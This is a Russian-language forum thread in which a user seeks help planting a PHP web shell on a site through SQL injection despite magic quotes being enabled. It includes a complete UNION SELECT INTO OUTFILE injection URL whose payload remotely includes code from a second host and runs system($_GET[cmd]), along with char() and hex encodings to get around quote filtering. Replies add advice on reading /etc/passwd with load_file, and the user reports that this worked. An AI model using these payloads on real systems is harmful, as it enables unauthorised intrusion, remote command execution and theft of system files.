Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1
RSS
SQl инъекция, Залить шелл через SQL инъекцию!
 
Нужна помощь при sql инъекции. Нужно залить шелл через sql инъеккцию. Но возникает одна проблема. Она состоит в том что на сервере включены магические кавычки.
Вот что я пишу в адресной строке:
http://mysite.ru/index.php3?mode=showcar&carid=-1+union+select+1,'<?php include ("http://mysite2/rem.php"); ?>','<?php system($_GET[cmd]);?>',4,5,6,7,8,9,10,11,12,13,14,15,16+from+mysql.user+into+outfile+'/home/www3/mysite.ru/shellka.php'
Ну понятно '<?php include ("http://mysite2/rem.php"); ?>' и '<?php system($_GET[cmd]);?>' мы заменим на
char(39,60,63,112,104,112,32,105,110,99,108,117,100,101,32,40,34,104,116,116,112,58,47,47,109,121,115,105,116,101,50,47,114,101,109,46,112,104,112,34,41,59,32,63,62,39)
и на char(39,60,63,112,104,112,32,115,121,115,116,101,109,40,36,95,71,69,84,91,99,109,100,93,41,59,63,62,39).
Здесь все понятно я просто использую функцию char. А вот например с '/home/www3/mysite.ru/shellka.php' будет посложнее. Как обработать '/home/www3/mysite.ru/shellka.php'? тоже char или нет?
И чтоб залить файл на сервер надо чтоб были права на чтение и запись (777) и все?
 
Чтобы залить шел нужна директория доступная на запись всем и права File у пользователя от имени которого работает скрипт.
 
Цитата
Игорь Л пишет:
И чтоб залить файл на сервер надо чтоб были права на чтение и запись (777) и все?
попробуй прочитать /etc/passwd через loadfile , если не получится, значит нет file_priv , а следовательно into outfile не поможет...
 
f_s_b_37,
Скорей читать таким образом нужно файл из той же директории. Не забывай, что скрипту совсем не обязательно должен быть доступен на чтение /etc/passwd
Если права расставлены корректно - через скрипт не получится прочитать. Не получится ещё и в случае, если web-сервер запущен в chroot'е
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
АГА я смог просмотреть файл etc/passwd. :D
1. И кто знает какие  файлы могут быть в папке etc?
2. А кто нибудь скажет как обработать '/home/www3/mysite.ru/shellka.php'?(тут вообще чар нужен или подугому надо сделать)
PS на сервере стоят магические кавычки!
Жду ответы на мои вопросы!
Буду рад если ответите!
:D
 
Никто не ответит мне на мое сообщение?
 
Цитата
Игорь Л пишет:
И кто знает какие файлы могут быть в папке etc?
Поставь себе линукс и посмотри
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
Цитата
Чтобы залить шел нужна директория доступная на запись всем и права File у пользователя от имени которого работает скрипт.

поробуй чтонить типа upload у форума

Цитата
И кто знает какие файлы могут быть в папке etc?
Конфиги



Цитата
PS на сервере стоят магические кавычки
функцииям для работами с файломи в mysql нужно указывать имя файлов в ковычках а сревер их фильтрует
 
Используй хекс кодировку строки /home/www3/mysite.ru/shellka.php,
т.е. попробуй так into+outfile+0x2F686F6D652F777777332F6D79736974652E72752F736­8656C6C6B612E706870/*
 
Цитата
Используй хекс кодировку строки /home/www3/mysite.ru/shellka.php,
т.е. попробуй так into+outfile+0x2F686F6D652F777777332F6D79736974652E72752F736­8656C6C6B612E706870/*
Если стоит magic_quotes_gpc, то INTO OUTFILE реализовать в любом случае не удастся, даже с помощью представления строки в виде hex
 
Цитата
Raz0r пишет:
Если стоит magic_quotes_gpc, то INTO OUTFILE реализовать в любом случае не удастся
какая связь между зеркалированием спецсимволов и привилегией мускуля file_priv ? 0о
 
Цитата
f_s_b_37 пишет:
какая связь между зеркалированием спецсимволов и привилегией мускуля file_priv ? 0о
вот именно в чем связь? =) Я вообще-то про особенности INTO OUTFILE говорил, а именно хотел сказать то, что значение необходимо передавать только в кавычках.
Страницы: 1
Читают тему (гостей: 1)